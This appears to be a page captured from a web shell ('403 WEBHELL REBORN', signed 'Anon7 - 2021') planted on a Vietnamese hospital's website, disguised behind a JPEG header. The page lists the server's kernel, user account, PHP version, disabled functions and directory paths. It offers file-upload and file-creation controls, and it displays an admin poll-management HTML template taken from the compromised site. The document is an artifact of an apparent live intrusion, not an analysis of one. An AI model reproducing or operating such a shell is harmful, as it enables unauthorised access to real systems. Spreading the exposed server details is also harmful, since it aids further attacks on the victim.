ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/adminvn/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html////adminvn/templates/cp_10_2.html
<!-- BEGIN: cp_10_2 -->
<div class="row">
  <div class="col-lg-5">
    <div class="main-box clearfix">
      <h2>Thăm dò ý kiến</h2>
      <div class="conversation-wrapper">

        <form action="poll.php?type={epoll_action}" method="post">
         
                    <table width="100%" border="0">
                        <tr>
                            <td colspan="2">
                                <table width="100%">
                                    <tr>
                                        <td colspan="2">
                                            <div class="form-group">
                                                <label for="exampleTooltip">Câu hỏi - Trả lời</label>
                                               <textarea class="form-control" name="name" style="width: 100%;" required>{epoll_name}</textarea>
                                               <input type="hidden" name="id" value="{epoll_id}" />
                                            </div>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td colspan="2">
                                            <div class="form-group">
                                            <label for="exampleTooltip">Vị trí &nbsp;&nbsp;</label>
                                                <select name="pid" class="form-control">
                                                    <option value="0">Câu hỏi</option>
                                                    <optgroup label="Trả lời của">
                                                    <!-- BEGIN: add_poll -->
                                                    <option style="padding-left: 10px;" value="{poll_id}" {epoll_check}>{poll_name}</option>
                                                    <!-- END: add_poll -->
                                                    </optgroup>
                                                </select>
                                            </div>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td valign="top" width="50%">
                                            <div class="form-group">
                                                <label for="exampleTooltip">Thứ tự &nbsp;&nbsp;</label>
                                                <input type="text" name="order" style="width: 80px;" class="form-control" value="{epoll_order}" required/>
                                            </div>
                                            
                                        </td>
                                        <td valign="top">
                                             <div class="form-group">
                                                <label for="exampleTooltip">Hiển thị &nbsp;&nbsp;</label>
                                                   
                                                        <div class="onoffswitch">
                                                            <input type="checkbox" name="onoffswitch" class="onoffswitch-checkbox" id="myonoffswitch" {poll_active1}>
                                                            <label class="onoffswitch-label" for="myonoffswitch">
                                                                <div class="onoffswitch-inner"></div>
                                                                <div class="onoffswitch-switch"></div>
                                                            </label>
                                                        </div>
                                                
                                            </div>
                                            
                                        </td>
                                    </tr>
                                    <tr>
                                        <td colspan="2">
                                            
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>

                        
                        <tr>
                            <td valign="top">
                            <p class="progress-demo"><button class="btn btn-danger ladda-button" data-style="expand-left"><span class="ladda-label">{epoll_bt}</span></button></p>
                            </td>
                            
                        </tr>
                    </table>
                </form>
      </div>
    </div>
  </div>
  <div class="col-lg-7">
    <div class="main-box clearfix">
      <h2>Danh sách thăm dò</h2>
      <div class="conversation-wrapper">
        <form action="poll.php?type=del" method="post">
                <div class="start-mod radius-top radius-bottom">

                <table class="table table-striped table-hover">
                    <thead>
                        <tr>
                            <th width="20"><input type="checkbox" onclick="checkall('item', this)" name="check" class="checkbox"/></th>

                            <th width="50"><span>STT</span></th>
                            <th class="text-left"><span>Câu hỏi - Trả lời</span></th>
                            <th class="text-center">Số phiếu - %</th>
                        </tr>
                    </thead>
                     <!-- BEGIN: list_poll -->
                    <tr>
                        <td>
                            <input class="item" name="id[]" type="checkbox" value="{lpoll_id}" />
                            <input name="rowid[]" type="hidden" value="{lpoll_id}"/>
                        </td>
                        <td valign="top"><input class="cats_order" type="text" name="idorder[]" value="{lpoll_order}" size="2" /></td>

                        <td valign="top"><strong><a href="index.php?m=10&sm=2&id={lpoll_id}" style="{active_color}">{lpoll_name}</a></strong></td>
                        <td valign="top"  align="center">{lpoll_total}</td>
                    </tr>
                    <!-- BEGIN: list_poll_sub -->
                    <tr>
                        <td>
                            <input class="item" name="id[]" type="checkbox" value="{lspoll_id}" />
                            <input name="rowid[]" type="hidden" value="{lspoll_id}"/>
                        </td>

                        <td valign="top"></td>
                        <td valign="top" style="padding-left: 20px;">
                            <input class="cats_order" type="text" name="idorder[]" value="{lspoll_order}" size="2" /> 
                            <a href="index.php?m=10&sm=2&id={lspoll_id}" style="{active_color}">{lspoll_name}</a></td>
                        <td valign="top" align="center">{lspoll_pc}</td>
                    </tr>
                    <!-- END: list_poll_sub -->
                    <!-- END: list_poll -->


                </table> 
                </div>
                <table>
                    <tr>
                    <td valign="top">
                        <select name="action"  class="form-control">
                            <option>Lựa chọn</option>
                            <option value="2">Sắp xếp</option>
                            <option value="1">Xóa</option>
                        </select>
                    </td>
                    <td style="padding-left: 10px;" class="progress-demo"><button class="btn btn-success ladda-button" data-style="expand-left"><span class="ladda-label">Thực hiện</span></button></td>
                    </tr>
                </table>
                </form>
      </div>
    </div>
  </div>
</div>
<!-- END: cp_10_2 -->

Anon7 - 2021